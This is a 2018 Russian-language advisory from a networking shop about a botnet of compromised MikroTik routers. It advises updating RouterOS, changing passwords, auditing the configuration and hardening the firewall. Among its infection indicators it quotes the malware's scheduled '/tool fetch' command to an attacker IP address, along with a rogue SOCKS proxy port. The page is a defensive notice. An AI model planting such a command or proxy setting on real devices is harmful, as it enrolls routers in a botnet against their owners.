info@its-wifi.ru
Корзина пуста
Сравнение

Важно! Срочно обновите прошивки Mikrotik до последней версии!

07.09.2018

Обнаружен ботнет из устройств MikroTik, использующих старые версии RouterOS (с 6.29 по v6.42.1). В связи с этим необходимо срочно обновить прошивки на всех устройствах, самый простой способ сделать это - нажать кнопку "Check for updates" в меню System -> Packages. 

Желательно проделать следующие шаги:

1. Обновить RouterOS до последней стабильной версии

2. Поменять пароли всех пользователей

3. Восстановить конфигурацию и проверить её на наличие неизвестных настроек

4. Настроить фаирвол (можно использовать статью https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router)

 

Понять что роутер заражен, можно понять следующим образом:

— Отключены все drop правила на файрволле.
— Включается socks (IP – Socks) на нестандартном порте, в моем случае 4145.
— Добавлен скрипт /tool fetch address=95.154.216.166 port=2008 src-path=/mikrotik.php mode=http keep-result=no в System – Scripts 
— Добавлен запуск скрипта в System – Scheduler.
— Удаляет существующие скрипты (по сообщениям на форуме Mikrotik).

 

Так же рекомендуем сделать /export в терминале и проверить конфигурацию глазами. 

 


Комментарии

Пока нет комментариев

Написать комментарий



Оцените качество магазина на Яндекс.Маркете.